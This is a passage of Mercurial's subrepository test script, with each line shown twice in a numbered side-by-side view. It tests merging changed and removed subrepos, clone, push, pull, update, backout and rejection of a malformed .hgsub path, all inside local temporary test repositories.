393 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
393 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
394 $ hg ci -m 'local removed, remote changed, keep removed'
394 $ hg ci -m 'local removed, remote changed, keep removed'
395 created new head
395 created new head
396 $ hg debugsub
396 $ hg debugsub
397 path s
397 path s
398 source s
398 source s
399 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
399 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
400 $ cat .hgsubstate
400 $ cat .hgsubstate
401 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
401 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
402
402
403 local changed, remote removed, keep changed
403 local changed, remote removed, keep changed
404
404
405 $ hg co -C 6
405 $ hg co -C 6
406 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
406 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
407 $ hg merge 11
407 $ hg merge 11
408 local [working copy] changed subrepository t which remote [merge rev] removed
408 local [working copy] changed subrepository t which remote [merge rev] removed
409 use (c)hanged version or (d)elete? c
409 use (c)hanged version or (d)elete? c
410 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
410 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
411 (branch merge, don't forget to commit)
411 (branch merge, don't forget to commit)
412 BROKEN: should include subrepo t
412 BROKEN: should include subrepo t
413 $ hg debugsub
413 $ hg debugsub
414 path s
414 path s
415 source s
415 source s
416 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
416 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
417 BROKEN: should include subrepo t
417 BROKEN: should include subrepo t
418 $ cat .hgsubstate
418 $ cat .hgsubstate
419 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
419 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
420 $ hg ci -m 'local changed, remote removed, keep changed'
420 $ hg ci -m 'local changed, remote removed, keep changed'
421 created new head
421 created new head
422 BROKEN: should include subrepo t
422 BROKEN: should include subrepo t
423 $ hg debugsub
423 $ hg debugsub
424 path s
424 path s
425 source s
425 source s
426 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
426 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
427 BROKEN: should include subrepo t
427 BROKEN: should include subrepo t
428 $ cat .hgsubstate
428 $ cat .hgsubstate
429 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
429 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
430 $ cat t/t
430 $ cat t/t
431 t2
431 t2
432
432
433 local changed, remote removed, keep removed
433 local changed, remote removed, keep removed
434
434
435 $ hg co -C 6
435 $ hg co -C 6
436 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
436 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
437 $ hg merge --config ui.interactive=true 11 <<EOF
437 $ hg merge --config ui.interactive=true 11 <<EOF
438 > d
438 > d
439 > EOF
439 > EOF
440 local [working copy] changed subrepository t which remote [merge rev] removed
440 local [working copy] changed subrepository t which remote [merge rev] removed
441 use (c)hanged version or (d)elete? d
441 use (c)hanged version or (d)elete? d
442 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
442 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
443 (branch merge, don't forget to commit)
443 (branch merge, don't forget to commit)
444 $ hg debugsub
444 $ hg debugsub
445 path s
445 path s
446 source s
446 source s
447 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
447 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
448 $ cat .hgsubstate
448 $ cat .hgsubstate
449 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
449 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
450 $ hg ci -m 'local changed, remote removed, keep removed'
450 $ hg ci -m 'local changed, remote removed, keep removed'
451 created new head
451 created new head
452 $ hg debugsub
452 $ hg debugsub
453 path s
453 path s
454 source s
454 source s
455 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
455 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
456 $ cat .hgsubstate
456 $ cat .hgsubstate
457 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
457 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
458
458
459 clean up to avoid having to fix up the tests below
459 clean up to avoid having to fix up the tests below
460
460
461 $ hg co -C 10
461 $ hg co -C 10
462 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
462 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
463 $ cat >> $HGRCPATH <<EOF
463 $ cat >> $HGRCPATH <<EOF
464 > [extensions]
464 > [extensions]
465 > strip=
465 > strip=
466 > EOF
466 > EOF
467 $ hg strip -r 11:15
467 $ hg strip -r 11:15
468 saved backup bundle to $TESTTMP/t/.hg/strip-backup/*-backup.hg (glob)
468 saved backup bundle to $TESTTMP/t/.hg/strip-backup/*-backup.hg (glob)
469
469
470 clone
470 clone
471
471
472 $ cd ..
472 $ cd ..
473 $ hg clone t tc
473 $ hg clone t tc
474 updating to branch default
474 updating to branch default
475 cloning subrepo s from $TESTTMP/t/s
475 cloning subrepo s from $TESTTMP/t/s
476 cloning subrepo s/ss from $TESTTMP/t/s/ss (glob)
476 cloning subrepo s/ss from $TESTTMP/t/s/ss (glob)
477 cloning subrepo t from $TESTTMP/t/t
477 cloning subrepo t from $TESTTMP/t/t
478 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
478 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
479 $ cd tc
479 $ cd tc
480 $ hg debugsub
480 $ hg debugsub
481 path s
481 path s
482 source s
482 source s
483 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
483 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
484 path t
484 path t
485 source t
485 source t
486 revision 20a0db6fbf6c3d2836e6519a642ae929bfc67c0e
486 revision 20a0db6fbf6c3d2836e6519a642ae929bfc67c0e
487
487
488 push
488 push
489
489
490 $ echo bah > t/t
490 $ echo bah > t/t
491 $ hg ci -m11
491 $ hg ci -m11
492 committing subrepository t
492 committing subrepository t
493 $ hg push
493 $ hg push
494 pushing to $TESTTMP/t (glob)
494 pushing to $TESTTMP/t (glob)
495 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
495 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
496 no changes made to subrepo s since last push to $TESTTMP/t/s
496 no changes made to subrepo s since last push to $TESTTMP/t/s
497 pushing subrepo t to $TESTTMP/t/t
497 pushing subrepo t to $TESTTMP/t/t
498 searching for changes
498 searching for changes
499 adding changesets
499 adding changesets
500 adding manifests
500 adding manifests
501 adding file changes
501 adding file changes
502 added 1 changesets with 1 changes to 1 files
502 added 1 changesets with 1 changes to 1 files
503 searching for changes
503 searching for changes
504 adding changesets
504 adding changesets
505 adding manifests
505 adding manifests
506 adding file changes
506 adding file changes
507 added 1 changesets with 1 changes to 1 files
507 added 1 changesets with 1 changes to 1 files
508
508
509 push -f
509 push -f
510
510
511 $ echo bah > s/a
511 $ echo bah > s/a
512 $ hg ci -m12
512 $ hg ci -m12
513 committing subrepository s
513 committing subrepository s
514 $ hg push
514 $ hg push
515 pushing to $TESTTMP/t (glob)
515 pushing to $TESTTMP/t (glob)
516 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
516 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
517 pushing subrepo s to $TESTTMP/t/s
517 pushing subrepo s to $TESTTMP/t/s
518 searching for changes
518 searching for changes
519 abort: push creates new remote head 12a213df6fa9! (in subrepository "s")
519 abort: push creates new remote head 12a213df6fa9! (in subrepository "s")
520 (merge or see 'hg help push' for details about pushing new heads)
520 (merge or see 'hg help push' for details about pushing new heads)
521 [255]
521 [255]
522 $ hg push -f
522 $ hg push -f
523 pushing to $TESTTMP/t (glob)
523 pushing to $TESTTMP/t (glob)
524 pushing subrepo s/ss to $TESTTMP/t/s/ss (glob)
524 pushing subrepo s/ss to $TESTTMP/t/s/ss (glob)
525 searching for changes
525 searching for changes
526 no changes found
526 no changes found
527 pushing subrepo s to $TESTTMP/t/s
527 pushing subrepo s to $TESTTMP/t/s
528 searching for changes
528 searching for changes
529 adding changesets
529 adding changesets
530 adding manifests
530 adding manifests
531 adding file changes
531 adding file changes
532 added 1 changesets with 1 changes to 1 files (+1 heads)
532 added 1 changesets with 1 changes to 1 files (+1 heads)
533 pushing subrepo t to $TESTTMP/t/t
533 pushing subrepo t to $TESTTMP/t/t
534 searching for changes
534 searching for changes
535 no changes found
535 no changes found
536 searching for changes
536 searching for changes
537 adding changesets
537 adding changesets
538 adding manifests
538 adding manifests
539 adding file changes
539 adding file changes
540 added 1 changesets with 1 changes to 1 files
540 added 1 changesets with 1 changes to 1 files
541
541
542 check that unmodified subrepos are not pushed
542 check that unmodified subrepos are not pushed
543
543
544 $ hg clone . ../tcc
544 $ hg clone . ../tcc
545 updating to branch default
545 updating to branch default
546 cloning subrepo s from $TESTTMP/tc/s
546 cloning subrepo s from $TESTTMP/tc/s
547 cloning subrepo s/ss from $TESTTMP/tc/s/ss (glob)
547 cloning subrepo s/ss from $TESTTMP/tc/s/ss (glob)
548 cloning subrepo t from $TESTTMP/tc/t
548 cloning subrepo t from $TESTTMP/tc/t
549 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
549 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
550
550
551 the subrepos on the new clone have nothing to push to its source
551 the subrepos on the new clone have nothing to push to its source
552
552
553 $ hg push -R ../tcc .
553 $ hg push -R ../tcc .
554 pushing to .
554 pushing to .
555 no changes made to subrepo s/ss since last push to s/ss (glob)
555 no changes made to subrepo s/ss since last push to s/ss (glob)
556 no changes made to subrepo s since last push to s
556 no changes made to subrepo s since last push to s
557 no changes made to subrepo t since last push to t
557 no changes made to subrepo t since last push to t
558 searching for changes
558 searching for changes
559 no changes found
559 no changes found
560 [1]
560 [1]
561
561
562 the subrepos on the source do not have a clean store versus the clone target
562 the subrepos on the source do not have a clean store versus the clone target
563 because they were never explicitly pushed to the source
563 because they were never explicitly pushed to the source
564
564
565 $ hg push ../tcc
565 $ hg push ../tcc
566 pushing to ../tcc
566 pushing to ../tcc
567 pushing subrepo s/ss to ../tcc/s/ss (glob)
567 pushing subrepo s/ss to ../tcc/s/ss (glob)
568 searching for changes
568 searching for changes
569 no changes found
569 no changes found
570 pushing subrepo s to ../tcc/s
570 pushing subrepo s to ../tcc/s
571 searching for changes
571 searching for changes
572 no changes found
572 no changes found
573 pushing subrepo t to ../tcc/t
573 pushing subrepo t to ../tcc/t
574 searching for changes
574 searching for changes
575 no changes found
575 no changes found
576 searching for changes
576 searching for changes
577 no changes found
577 no changes found
578 [1]
578 [1]
579
579
580 after push their stores become clean
580 after push their stores become clean
581
581
582 $ hg push ../tcc
582 $ hg push ../tcc
583 pushing to ../tcc
583 pushing to ../tcc
584 no changes made to subrepo s/ss since last push to ../tcc/s/ss (glob)
584 no changes made to subrepo s/ss since last push to ../tcc/s/ss (glob)
585 no changes made to subrepo s since last push to ../tcc/s
585 no changes made to subrepo s since last push to ../tcc/s
586 no changes made to subrepo t since last push to ../tcc/t
586 no changes made to subrepo t since last push to ../tcc/t
587 searching for changes
587 searching for changes
588 no changes found
588 no changes found
589 [1]
589 [1]
590
590
591 updating a subrepo to a different revision or changing
591 updating a subrepo to a different revision or changing
592 its working directory does not make its store dirty
592 its working directory does not make its store dirty
593
593
594 $ hg -R s update '.^'
594 $ hg -R s update '.^'
595 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
595 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
596 $ hg push
596 $ hg push
597 pushing to $TESTTMP/t (glob)
597 pushing to $TESTTMP/t (glob)
598 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
598 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
599 no changes made to subrepo s since last push to $TESTTMP/t/s
599 no changes made to subrepo s since last push to $TESTTMP/t/s
600 no changes made to subrepo t since last push to $TESTTMP/t/t
600 no changes made to subrepo t since last push to $TESTTMP/t/t
601 searching for changes
601 searching for changes
602 no changes found
602 no changes found
603 [1]
603 [1]
604 $ echo foo >> s/a
604 $ echo foo >> s/a
605 $ hg push
605 $ hg push
606 pushing to $TESTTMP/t (glob)
606 pushing to $TESTTMP/t (glob)
607 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
607 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
608 no changes made to subrepo s since last push to $TESTTMP/t/s
608 no changes made to subrepo s since last push to $TESTTMP/t/s
609 no changes made to subrepo t since last push to $TESTTMP/t/t
609 no changes made to subrepo t since last push to $TESTTMP/t/t
610 searching for changes
610 searching for changes
611 no changes found
611 no changes found
612 [1]
612 [1]
613 $ hg -R s update -C tip
613 $ hg -R s update -C tip
614 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
614 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
615
615
616 committing into a subrepo makes its store (but not its parent's store) dirty
616 committing into a subrepo makes its store (but not its parent's store) dirty
617
617
618 $ echo foo >> s/ss/a
618 $ echo foo >> s/ss/a
619 $ hg -R s/ss commit -m 'test dirty store detection'
619 $ hg -R s/ss commit -m 'test dirty store detection'
620
620
621 $ hg out -S -r `hg log -r tip -T "{node|short}"`
621 $ hg out -S -r `hg log -r tip -T "{node|short}"`
622 comparing with $TESTTMP/t (glob)
622 comparing with $TESTTMP/t (glob)
623 searching for changes
623 searching for changes
624 no changes found
624 no changes found
625 comparing with $TESTTMP/t/s
625 comparing with $TESTTMP/t/s
626 searching for changes
626 searching for changes
627 no changes found
627 no changes found
628 comparing with $TESTTMP/t/s/ss
628 comparing with $TESTTMP/t/s/ss
629 searching for changes
629 searching for changes
630 changeset: 1:79ea5566a333
630 changeset: 1:79ea5566a333
631 tag: tip
631 tag: tip
632 user: test
632 user: test
633 date: Thu Jan 01 00:00:00 1970 +0000
633 date: Thu Jan 01 00:00:00 1970 +0000
634 summary: test dirty store detection
634 summary: test dirty store detection
635
635
636 comparing with $TESTTMP/t/t
636 comparing with $TESTTMP/t/t
637 searching for changes
637 searching for changes
638 no changes found
638 no changes found
639
639
640 $ hg push
640 $ hg push
641 pushing to $TESTTMP/t (glob)
641 pushing to $TESTTMP/t (glob)
642 pushing subrepo s/ss to $TESTTMP/t/s/ss (glob)
642 pushing subrepo s/ss to $TESTTMP/t/s/ss (glob)
643 searching for changes
643 searching for changes
644 adding changesets
644 adding changesets
645 adding manifests
645 adding manifests
646 adding file changes
646 adding file changes
647 added 1 changesets with 1 changes to 1 files
647 added 1 changesets with 1 changes to 1 files
648 no changes made to subrepo s since last push to $TESTTMP/t/s
648 no changes made to subrepo s since last push to $TESTTMP/t/s
649 no changes made to subrepo t since last push to $TESTTMP/t/t
649 no changes made to subrepo t since last push to $TESTTMP/t/t
650 searching for changes
650 searching for changes
651 no changes found
651 no changes found
652 [1]
652 [1]
653
653
654 a subrepo store may be clean versus one repo but not versus another
654 a subrepo store may be clean versus one repo but not versus another
655
655
656 $ hg push
656 $ hg push
657 pushing to $TESTTMP/t (glob)
657 pushing to $TESTTMP/t (glob)
658 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
658 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
659 no changes made to subrepo s since last push to $TESTTMP/t/s
659 no changes made to subrepo s since last push to $TESTTMP/t/s
660 no changes made to subrepo t since last push to $TESTTMP/t/t
660 no changes made to subrepo t since last push to $TESTTMP/t/t
661 searching for changes
661 searching for changes
662 no changes found
662 no changes found
663 [1]
663 [1]
664 $ hg push ../tcc
664 $ hg push ../tcc
665 pushing to ../tcc
665 pushing to ../tcc
666 pushing subrepo s/ss to ../tcc/s/ss (glob)
666 pushing subrepo s/ss to ../tcc/s/ss (glob)
667 searching for changes
667 searching for changes
668 adding changesets
668 adding changesets
669 adding manifests
669 adding manifests
670 adding file changes
670 adding file changes
671 added 1 changesets with 1 changes to 1 files
671 added 1 changesets with 1 changes to 1 files
672 no changes made to subrepo s since last push to ../tcc/s
672 no changes made to subrepo s since last push to ../tcc/s
673 no changes made to subrepo t since last push to ../tcc/t
673 no changes made to subrepo t since last push to ../tcc/t
674 searching for changes
674 searching for changes
675 no changes found
675 no changes found
676 [1]
676 [1]
677
677
678 update
678 update
679
679
680 $ cd ../t
680 $ cd ../t
681 $ hg up -C # discard our earlier merge
681 $ hg up -C # discard our earlier merge
682 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
682 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
683 updated to "c373c8102e68: 12"
683 updated to "c373c8102e68: 12"
684 2 other heads for branch "default"
684 2 other heads for branch "default"
685 $ echo blah > t/t
685 $ echo blah > t/t
686 $ hg ci -m13
686 $ hg ci -m13
687 committing subrepository t
687 committing subrepository t
688
688
689 backout calls revert internally with minimal opts, which should not raise
689 backout calls revert internally with minimal opts, which should not raise
690 KeyError
690 KeyError
691
691
692 $ hg backout ".^" --no-commit
692 $ hg backout ".^" --no-commit
693 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
693 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
694 changeset c373c8102e68 backed out, don't forget to commit.
694 changeset c373c8102e68 backed out, don't forget to commit.
695
695
696 $ hg up -C # discard changes
696 $ hg up -C # discard changes
697 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
697 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
698 updated to "925c17564ef8: 13"
698 updated to "925c17564ef8: 13"
699 2 other heads for branch "default"
699 2 other heads for branch "default"
700
700
701 pull
701 pull
702
702
703 $ cd ../tc
703 $ cd ../tc
704 $ hg pull
704 $ hg pull
705 pulling from $TESTTMP/t (glob)
705 pulling from $TESTTMP/t (glob)
706 searching for changes
706 searching for changes
707 adding changesets
707 adding changesets
708 adding manifests
708 adding manifests
709 adding file changes
709 adding file changes
710 added 1 changesets with 1 changes to 1 files
710 added 1 changesets with 1 changes to 1 files
711 (run 'hg update' to get a working copy)
711 (run 'hg update' to get a working copy)
712
712
713 should pull t
713 should pull t
714
714
715 $ hg incoming -S -r `hg log -r tip -T "{node|short}"`
715 $ hg incoming -S -r `hg log -r tip -T "{node|short}"`
716 comparing with $TESTTMP/t (glob)
716 comparing with $TESTTMP/t (glob)
717 no changes found
717 no changes found
718 comparing with $TESTTMP/t/s
718 comparing with $TESTTMP/t/s
719 searching for changes
719 searching for changes
720 no changes found
720 no changes found
721 comparing with $TESTTMP/t/s/ss
721 comparing with $TESTTMP/t/s/ss
722 searching for changes
722 searching for changes
723 no changes found
723 no changes found
724 comparing with $TESTTMP/t/t
724 comparing with $TESTTMP/t/t
725 searching for changes
725 searching for changes
726 changeset: 5:52c0adc0515a
726 changeset: 5:52c0adc0515a
727 tag: tip
727 tag: tip
728 user: test
728 user: test
729 date: Thu Jan 01 00:00:00 1970 +0000
729 date: Thu Jan 01 00:00:00 1970 +0000
730 summary: 13
730 summary: 13
731
731
732
732
733 $ hg up
733 $ hg up
734 pulling subrepo t from $TESTTMP/t/t
734 pulling subrepo t from $TESTTMP/t/t
735 searching for changes
735 searching for changes
736 adding changesets
736 adding changesets
737 adding manifests
737 adding manifests
738 adding file changes
738 adding file changes
739 added 1 changesets with 1 changes to 1 files
739 added 1 changesets with 1 changes to 1 files
740 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
740 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
741 updated to "925c17564ef8: 13"
741 updated to "925c17564ef8: 13"
742 2 other heads for branch "default"
742 2 other heads for branch "default"
743 $ cat t/t
743 $ cat t/t
744 blah
744 blah
745
745
746 bogus subrepo path aborts
746 bogus subrepo path aborts
747
747
748 $ echo 'bogus=[boguspath' >> .hgsub
748 $ echo 'bogus=[boguspath' >> .hgsub
749 $ hg ci -m 'bogus subrepo path'
749 $ hg ci -m 'bogus subrepo path'
750 abort: missing ] in subrepository source
750 abort: missing ] in subrepository source
751 [255]
751 [255]
752
752
753 Issue1986: merge aborts when trying to merge a subrepo that
753 Issue1986: merge aborts when trying to merge a subrepo that
754 shouldn't need merging
754 shouldn't need merging
755
755
756 # subrepo layout
756 # subrepo layout
757 #
757 #
758 # o 5 br
758 # o 5 br
759 # /|
759 # /|
760 # o | 4 default
760 # o | 4 default
761 # | |
761 # | |
762 # | o 3 br
762 # | o 3 br
763 # |/|
763 # |/|
764 # o | 2 default
764 # o | 2 default
765 # | |
765 # | |
766 # | o 1 br
766 # | o 1 br
767 # |/
767 # |/
768 # o 0 default
768 # o 0 default
769
769
770 $ cd ..
770 $ cd ..
771 $ rm -rf sub
771 $ rm -rf sub
772 $ hg init main
772 $ hg init main
773 $ cd main
773 $ cd main
774 $ hg init s
774 $ hg init s
775 $ cd s
775 $ cd s
776 $ echo a > a
776 $ echo a > a
777 $ hg ci -Am1
777 $ hg ci -Am1
778 adding a
778 adding a
779 $ hg branch br
779 $ hg branch br
780 marked working directory as branch br
780 marked working directory as branch br
781 (branches are permanent and global, did you want a bookmark?)
781 (branches are permanent and global, did you want a bookmark?)
782 $ echo a >> a
782 $ echo a >> a
783 $ hg ci -m1
783 $ hg ci -m1
784 $ hg up default
784 $ hg up default
785 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
785 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
786 $ echo b > b
786 $ echo b > b
787 $ hg ci -Am1
787 $ hg ci -Am1
788 adding b
788 adding b
789 $ hg up br
789 $ hg up br
790 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
790 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
791 $ hg merge tip
791 $ hg merge tip
792 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
792 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
793 (branch merge, don't forget to commit)
793 (branch merge, don't forget to commit)
794 $ hg ci -m1
794 $ hg ci -m1
795 $ hg up 2
795 $ hg up 2
796 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
796 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
797 $ echo c > c
797 $ echo c > c
798 $ hg ci -Am1
798 $ hg ci -Am1
799 adding c
799 adding c
800 $ hg up 3
800 $ hg up 3
801 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
801 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
802 $ hg merge 4
802 $ hg merge 4
803 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
803 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
804 (branch merge, don't forget to commit)
804 (branch merge, don't forget to commit)
805 $ hg ci -m1
805 $ hg ci -m1
806
806
807 # main repo layout:
807 # main repo layout:
808 #
808 #
809 # * <-- try to merge default into br again
809 # * <-- try to merge default into br again
810 # .`|
810 # .`|
811 # . o 5 br --> substate = 5
811 # . o 5 br --> substate = 5
812 # . |
812 # . |
813 # o | 4 default --> substate = 4
813 # o | 4 default --> substate = 4
814 # | |
814 # | |
815 # | o 3 br --> substate = 2
815 # | o 3 br --> substate = 2
816 # |/|
816 # |/|
817 # o | 2 default --> substate = 2
817 # o | 2 default --> substate = 2
818 # | |
818 # | |
819 # | o 1 br --> substate = 3
819 # | o 1 br --> substate = 3
820 # |/
820 # |/
821 # o 0 default --> substate = 2
821 # o 0 default --> substate = 2
822
822
823 $ cd ..
823 $ cd ..
824 $ echo 's = s' > .hgsub
824 $ echo 's = s' > .hgsub
825 $ hg -R s up 2
825 $ hg -R s up 2
826 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
826 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
827 $ hg ci -Am1
827 $ hg ci -Am1
828 adding .hgsub
828 adding .hgsub
829 $ hg branch br
829 $ hg branch br
830 marked working directory as branch br
830 marked working directory as branch br
831 (branches are permanent and global, did you want a bookmark?)
831 (branches are permanent and global, did you want a bookmark?)
832 $ echo b > b
832 $ echo b > b
833 $ hg -R s up 3
833 $ hg -R s up 3
834 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
834 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
835 $ hg ci -Am1
835 $ hg ci -Am1
836 adding b
836 adding b
837 $ hg up default
837 $ hg up default
838 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
838 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
839 $ echo c > c
839 $ echo c > c
840 $ hg ci -Am1
840 $ hg ci -Am1
841 adding c
841 adding c
842 $ hg up 1
842 $ hg up 1
843 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
843 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
844 $ hg merge 2
844 $ hg merge 2
845 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
845 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
846 (branch merge, don't forget to commit)
846 (branch merge, don't forget to commit)
847 $ hg ci -m1
847 $ hg ci -m1
848 $ hg up 2
848 $ hg up 2
849 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
849 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
850 $ hg -R s up 4
850 $ hg -R s up 4
851 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
851 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
852 $ echo d > d
852 $ echo d > d
853 $ hg ci -Am1
853 $ hg ci -Am1
854 adding d
854 adding d
855 $ hg up 3
855 $ hg up 3
856 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
856 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
857 $ hg -R s up 5
857 $ hg -R s up 5
858 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
858 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
859 $ echo e > e
859 $ echo e > e
860 $ hg ci -Am1
860 $ hg ci -Am1
861 adding e
861 adding e
862
862
863 $ hg up 5
863 $ hg up 5
864 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
864 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
865 $ hg merge 4 # try to merge default into br again
865 $ hg merge 4 # try to merge default into br again
866 subrepository s diverged (local revision: f8f13b33206e, remote revision: a3f9062a4f88)
866 subrepository s diverged (local revision: f8f13b33206e, remote revision: a3f9062a4f88)
867 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
867 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
868 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
868 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
869 (branch merge, don't forget to commit)
869 (branch merge, don't forget to commit)
870 $ cd ..
870 $ cd ..
871
871
872 test subrepo delete from .hgsubstate
872 test subrepo delete from .hgsubstate
873
873
874 $ hg init testdelete
874 $ hg init testdelete
875 $ mkdir testdelete/nested testdelete/nested2
875 $ mkdir testdelete/nested testdelete/nested2
876 $ hg init testdelete/nested
876 $ hg init testdelete/nested
877 $ hg init testdelete/nested2
877 $ hg init testdelete/nested2
878 $ echo test > testdelete/nested/foo
878 $ echo test > testdelete/nested/foo
879 $ echo test > testdelete/nested2/foo
879 $ echo test > testdelete/nested2/foo
880 $ hg -R testdelete/nested add
880 $ hg -R testdelete/nested add
881 adding testdelete/nested/foo (glob)
881 adding testdelete/nested/foo (glob)
882 $ hg -R testdelete/nested2 add
882 $ hg -R testdelete/nested2 add
883 adding testdelete/nested2/foo (glob)
883 adding testdelete/nested2/foo (glob)
884 $ hg -R testdelete/nested ci -m test
884 $ hg -R testdelete/nested ci -m test
885 $ hg -R testdelete/nested2 ci -m test
885 $ hg -R testdelete/nested2 ci -m test
886 $ echo nested = nested > testdelete/.hgsub
886 $ echo nested = nested > testdelete/.hgsub
887 $ echo nested2 = nested2 >> testdelete/.hgsub
887 $ echo nested2 = nested2 >> testdelete/.hgsub
888 $ hg -R testdelete add
888 $ hg -R testdelete add
889 adding testdelete/.hgsub (glob)
889 adding testdelete/.hgsub (glob)
890 $ hg -R testdelete ci -m "nested 1 & 2 added"
890 $ hg -R testdelete ci -m "nested 1 & 2 added"
891 $ echo nested = nested > testdelete/.hgsub
891 $ echo nested = nested > testdelete/.hgsub
892 $ hg -R testdelete ci -m "nested 2 deleted"
892 $ hg -R testdelete ci -m "nested 2 deleted"
893 $ cat testdelete/.hgsubstate
893 $ cat testdelete/.hgsubstate
894 bdf5c9a3103743d900b12ae0db3ffdcfd7b0d878 nested
894 bdf5c9a3103743d900b12ae0db3ffdcfd7b0d878 nested
895 $ hg -R testdelete remove testdelete/.hgsub
895 $ hg -R testdelete remove testdelete/.hgsub
896 $ hg -R testdelete ci -m ".hgsub deleted"
896 $ hg -R testdelete ci -m ".hgsub deleted"
897 $ cat testdelete/.hgsubstate
897 $ cat testdelete/.hgsubstate
898 bdf5c9a3103743d900b12ae0db3ffdcfd7b0d878 nested
898 bdf5c9a3103743d900b12ae0db3ffdcfd7b0d878 nested
899
899
900 test repository cloning
900 test repository cloning
901
901
902 $ mkdir mercurial mercurial2
902 $ mkdir mercurial mercurial2
903 $ hg init nested_absolute
903 $ hg init nested_absolute
904 $ echo test > nested_absolute/foo
904 $ echo test > nested_absolute/foo
905 $ hg -R nested_absolute add
905 $ hg -R nested_absolute add
906 adding nested_absolute/foo (glob)
906 adding nested_absolute/foo (glob)
907 $ hg -R nested_absolute ci -mtest
907 $ hg -R nested_absolute ci -mtest
908 $ cd mercurial
908 $ cd mercurial
909 $ hg init nested_relative
909 $ hg init nested_relative
910 $ echo test2 > nested_relative/foo2
910 $ echo test2 > nested_relative/foo2
911 $ hg -R nested_relative add
911 $ hg -R nested_relative add
912 adding nested_relative/foo2 (glob)
